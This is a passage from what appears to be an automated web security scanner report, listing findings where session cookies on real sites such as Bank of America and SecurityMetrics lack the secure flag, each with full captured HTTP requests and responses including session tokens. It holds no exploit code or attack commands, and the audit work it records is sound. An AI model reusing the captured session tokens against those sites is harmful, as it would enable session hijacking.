Set-Cookie: ASPSESSIONIDSSSARBAA=ICKHJNCDOCHODDPLMDGOHIIG; path=/
Date: Tue, 26 Apr 2011 12:41:00 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

9.7. https://support.sentrigo.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set: PHPSESSID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4223
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...

9.8. https://www.bankofamerica.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set: TLTSID, TLTUID, JSESSIONID, BOA_0020, CONTEXT, INTL_LANG, LANG_COOKIE. Of these, JSESSIONID appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:22:51 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:22:51 GMT
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rarhzzt74SRcLv3FkL64au2:15pp20g5d; Path=/
Set-Cookie: BOA_0020=20110426:0:O:49008707-c17e-4746-931599acf898a369; Expires=Sat, 26 Apr 2031 12:23:11 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47814


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

9.9. https://www.bankofamerica.com/homepage/WidgetAction.go

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The following cookie was issued by the application and does not have the secure flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1303820701740&_=1303820711776 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:36 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000UmJOHI37nHLwr8Y5Et_eIFR:15bvh4t33; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4929

jsonp1303820701740({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...

9.10. https://www.bankofamerica.com/homepage/overview.go

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set: JSESSIONID, CONTEXT, INTL_LANG, LANG_COOKIE. Of these, JSESSIONID appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; cmRS=&t1=1303820662510&t2=1303820667589&t3=1303820694026&t4=1303820634257&lti=1303820694026&ln=&hr=javascript%3Adocument.stateSelectForm.submit%28%29%3B&fti=1303820694029&fn=state%20selector%20page_stateSelectForm%3A0%3B&ac=0:S&fd=0%3A3%3Astate%3B&uer=&fu=https%3A//www.bankofamerica.com/ProcessUser.do&pi=state%20selector%20page&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:24:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000dPG6ydQHxVjJLDzLY5rQEzC:157dm9o29; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47731


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

9.11. https://www.bankofamerica.com/homepage/stateSelect.go

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set: JSESSIONID, state, CONTEXT, INTL_LANG, LANG_COOKIE. Of these, JSESSIONID appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 12:46:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=00003O0kJlXrnqBcEyceskzwEx7:15povac7t; Path=/
Set-Cookie: state=""; Expires=Sun, 23 Oct 2011 12:46:49 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


9.12. https://www.mysecureconnect.com/login.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.mysecureconnect.com
Path:   /login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ASP.NET_SessionId. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.aspx HTTP/1.1
Host: www.mysecureconnect.com
Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=g40h4p45omjxdryp2nasdx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:57:56 GMT
Content-Length: 12063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<!-- TCP80::HTTPStatus::OK --
...[SNIP]...

9.13. https://lct.salesforce.com/sfga.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /sfga.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerlct-pool. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 12:40:18 GMT
Connection: close
Set-Cookie: BIGipServerlct-pool=171237898.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

9.14. https://olui2.fs.ml.com/login/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: Bear. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

9.15. https://securitymetrics.com/sm/PANscan/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: smsid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...

9.16. https://securitymetrics.com/sm/determinesaq/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: smsid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sm/determinesaq/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
Origin: https://securitymetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
Content-Length: 25

page=storechd&storechd=no

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/terminaltype
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:47 GMT
Server: SecurityMetrics/3.37.1j


9.17. https://securitymetrics.com/sm/determinesaq/reset

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/reset

Issue detail

The following cookie was issued by the application and does not have the secure flag set: smsid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/reset?resellerid= HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/storechd
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:31 GMT
Server: SecurityMetrics/3.37.1j


9.18. https://securitymetrics.com/sm/determinesaq/storechd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Issue detail

The following cookie was issued by the application and does not have the secure flag set: smsid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

9.19. https://securitymetrics.com/sm/determinesaq/terminaltype

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Issue detail

The following cookie was issued by the application and does not have the secure flag set: smsid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

9.20. https://shots-s.snap.com/snap_shots.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

9.21. https://store.tenable.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
